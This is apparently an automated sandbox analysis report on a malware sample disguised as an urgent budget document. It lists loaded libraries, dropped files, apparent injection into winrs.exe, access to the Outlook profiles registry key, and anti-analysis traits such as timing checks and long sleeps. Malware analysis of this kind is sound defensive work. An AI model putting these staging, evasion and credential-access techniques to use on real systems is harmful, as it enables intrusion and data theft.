        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wsmsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: pcwum.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Gaulin.iniJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: presupuesto urgente.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: winrs.pdbGCTL source: presupuesto urgente.exe, 00000002.00000003.8323727937.0000000003598000.00000004.00000020.00020000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000003.8423230370.00000000012D1000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: presupuesto urgente.exe, 00000002.00000001.8031630233.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12649228198.000000000058E000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: wntdll.pdbUGP source: presupuesto urgente.exe, 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8266535897.0000000033358000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263145257.00000000331A3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003900000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8358482622.000000000374C000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8355000605.0000000003593000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: presupuesto urgente.exe, presupuesto urgente.exe, 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8266535897.0000000033358000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263145257.00000000331A3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003900000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8358482622.000000000374C000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8355000605.0000000003593000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: winrs.pdb source: presupuesto urgente.exe, 00000002.00000003.8323727937.0000000003598000.00000004.00000020.00020000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000003.8423230370.00000000012D1000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: presupuesto urgente.exe, 00000002.00000001.8031630233.0000000000649000.00000020.00000001.01000000.00000007.sdmp

        Data Obfuscation

        Source: Yara matchFile source: 00000002.00000002.8355119953.0000000002B38000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.8108880079.00000000045E8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335308CD push ecx; mov dword ptr [esp], ecx2_2_335308D6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeFile created: C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\presupuesto urgente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\presupuesto urgente.exeAPI/Special instruction interceptor: Address: 45F967A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeAPI/Special instruction interceptor: Address: 2B4967A
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8D144
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8D604
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8D764
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8D324
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8D364
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8D004
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8FF74
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8D864
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33571763 rdtsc 2_2_33571763
        Source: C:\Windows\SysWOW64\winrs.exe Window / User API: threadDelayed 9156
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dll
        Source: C:\Users\user\Desktop\presupuesto urgente.exe API coverage: 0.3 %
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe TID: 5776 Thread sleep time: -115000s >= -30000s
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe TID: 5776 Thread sleep count: 43 > 30
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe TID: 5776 Thread sleep time: -64500s >= -30000s
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe TID: 5776 Thread sleep count: 54 > 30
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe TID: 5776 Thread sleep time: -54000s >= -30000s
        Source: C:\Windows\SysWOW64\winrs.exe TID: 780 Thread sleep count: 122 > 30
        Source: C:\Windows\SysWOW64\winrs.exe TID: 780 Thread sleep time: -244000s >= -30000s
        Source: C:\Windows\SysWOW64\winrs.exe TID: 780 Thread sleep count: 9156 > 30
        Source: C:\Windows\SysWOW64\winrs.exe TID: 780 Thread sleep time: -18312000s >= -30000s
        Source: C:\Windows\SysWOW64\winrs.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 0_2_004066F3 FindFirstFileW,FindClose,0_2_004066F3
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405ABE
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 0_2_00402862 FindFirstFileW,0_2_00402862
        Source: winrs.exe, 00000004.00000002.12649540671.0000000003256000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9(
        Source: presupuesto urgente.exe, 00000002.00000003.8263739558.0000000003540000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8361890120.0000000003540000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8361386340.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000005.00000002.8695253898.000001A431D5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: firefox.exe, 00000005.00000002.8695253898.000001A431D5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12650037876.00000000012CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`%E^
        Source: C:\Users\user\Desktop\presupuesto urgente.exe API call chain: ExitProcess graph end node graph_0-4671
        Source: C:\Users\user\Desktop\presupuesto urgente.exe API call chain: ExitProcess graph end node graph_0-4513
        Source: C:\Windows\SysWOW64\winrs.exe Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\winrs.exe Process queried: DebugPort
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 0_2_00402F14 GetTempPathW,GetTickCount,GetModuleFileNameW,GetFileSize,LdrInitializeThunk,GlobalAlloc,CreateFileW,0_2_00402F14
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_3356A350 mov eax, dword ptr fs:[00000030h] 2_2_3356A350
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33559194 mov eax, dword ptr fs:[00000030h]2_2_33559194
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571190 mov eax, dword ptr fs:[00000030h]2_2_33571190
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571190 mov eax, dword ptr fs:[00000030h]2_2_33571190
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33534180 mov eax, dword ptr fs:[00000030h]2_2_33534180
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33534180 mov eax, dword ptr fs:[00000030h]2_2_33534180
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33534180 mov eax, dword ptr fs:[00000030h]2_2_33534180
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_336051B6 mov eax, dword ptr fs:[00000030h]2_2_336051B6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335631BE mov eax, dword ptr fs:[00000030h]2_2_335631BE
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335631BE mov eax, dword ptr fs:[00000030h]2_2_335631BE
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335641BB mov ecx, dword ptr fs:[00000030h]2_2_335641BB
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335641BB mov eax, dword ptr fs:[00000030h]2_2_335641BB
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335641BB mov eax, dword ptr fs:[00000030h]2_2_335641BB
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356E1A4 mov eax, dword ptr fs:[00000030h]2_2_3356E1A4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356E1A4 mov eax, dword ptr fs:[00000030h]2_2_3356E1A4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33531051 mov eax, dword ptr fs:[00000030h]2_2_33531051
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33531051 mov eax, dword ptr fs:[00000030h]2_2_33531051
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33560044 mov eax, dword ptr fs:[00000030h]2_2_33560044
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33537072 mov eax, dword ptr fs:[00000030h]2_2_33537072
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33536074 mov eax, dword ptr fs:[00000030h]2_2_33536074
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33536074 mov eax, dword ptr fs:[00000030h]2_2_33536074
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3360505B mov eax, dword ptr fs:[00000030h]2_2_3360505B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335D9060 mov eax, dword ptr fs:[00000030h]2_2_335D9060
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572010 mov ecx, dword ptr fs:[00000030h]2_2_33572010
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33555004 mov eax, dword ptr fs:[00000030h]2_2_33555004
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33555004 mov ecx, dword ptr fs:[00000030h]2_2_33555004
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33538009 mov eax, dword ptr fs:[00000030h]2_2_33538009
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352D02D mov eax, dword ptr fs:[00000030h]2_2_3352D02D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354B0D0 mov eax, dword ptr fs:[00000030h]2_2_3354B0D0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B0D6 mov eax, dword ptr fs:[00000030h]2_2_3352B0D6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B0D6 mov eax, dword ptr fs:[00000030h]2_2_3352B0D6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B0D6 mov eax, dword ptr fs:[00000030h]2_2_3352B0D6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B0D6 mov eax, dword ptr fs:[00000030h]2_2_3352B0D6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352C0F6 mov eax, dword ptr fs:[00000030h]2_2_3352C0F6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356D0F0 mov eax, dword ptr fs:[00000030h]2_2_3356D0F0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356D0F0 mov ecx, dword ptr fs:[00000030h]2_2_3356D0F0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335290F8 mov eax, dword ptr fs:[00000030h]2_2_335290F8
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335290F8 mov eax, dword ptr fs:[00000030h]2_2_335290F8
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335290F8 mov eax, dword ptr fs:[00000030h]2_2_335290F8
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335290F8 mov eax, dword ptr fs:[00000030h]2_2_335290F8
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352A093 mov ecx, dword ptr fs:[00000030h]2_2_3352A093
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352C090 mov eax, dword ptr fs:[00000030h]2_2_3352C090
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_336050B7 mov eax, dword ptr fs:[00000030h]2_2_336050B7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604080 mov eax, dword ptr fs:[00000030h]2_2_33604080
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604080 mov eax, dword ptr fs:[00000030h]2_2_33604080
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604080 mov eax, dword ptr fs:[00000030h]2_2_33604080
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604080 mov eax, dword ptr fs:[00000030h]2_2_33604080
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604080 mov eax, dword ptr fs:[00000030h]2_2_33604080
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604080 mov eax, dword ptr fs:[00000030h]2_2_33604080
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604080 mov eax, dword ptr fs:[00000030h]2_2_33604080
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EB0AF mov eax, dword ptr fs:[00000030h]2_2_335EB0AF
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335700A5 mov eax, dword ptr fs:[00000030h]2_2_335700A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF0A5 mov eax, dword ptr fs:[00000030h]2_2_335DF0A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF0A5 mov eax, dword ptr fs:[00000030h]2_2_335DF0A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF0A5 mov eax, dword ptr fs:[00000030h]2_2_335DF0A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF0A5 mov eax, dword ptr fs:[00000030h]2_2_335DF0A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF0A5 mov eax, dword ptr fs:[00000030h]2_2_335DF0A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF0A5 mov eax, dword ptr fs:[00000030h]2_2_335DF0A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF0A5 mov eax, dword ptr fs:[00000030h]2_2_335DF0A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33552755 mov eax, dword ptr fs:[00000030h]2_2_33552755
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33552755 mov eax, dword ptr fs:[00000030h]2_2_33552755
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33552755 mov eax, dword ptr fs:[00000030h]2_2_33552755
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33552755 mov ecx, dword ptr fs:[00000030h]2_2_33552755
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33552755 mov eax, dword ptr fs:[00000030h]2_2_33552755
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33552755 mov eax, dword ptr fs:[00000030h]2_2_33552755
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356A750 mov eax, dword ptr fs:[00000030h]2_2_3356A750
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DE750 mov eax, dword ptr fs:[00000030h]2_2_335DE750
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33563740 mov eax, dword ptr fs:[00000030h]2_2_33563740
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356174A mov eax, dword ptr fs:[00000030h]2_2_3356174A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33560774 mov eax, dword ptr fs:[00000030h]2_2_33560774
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33534779 mov eax, dword ptr fs:[00000030h]2_2_33534779
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33534779 mov eax, dword ptr fs:[00000030h]2_2_33534779
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33542760 mov ecx, dword ptr fs:[00000030h]2_2_33542760
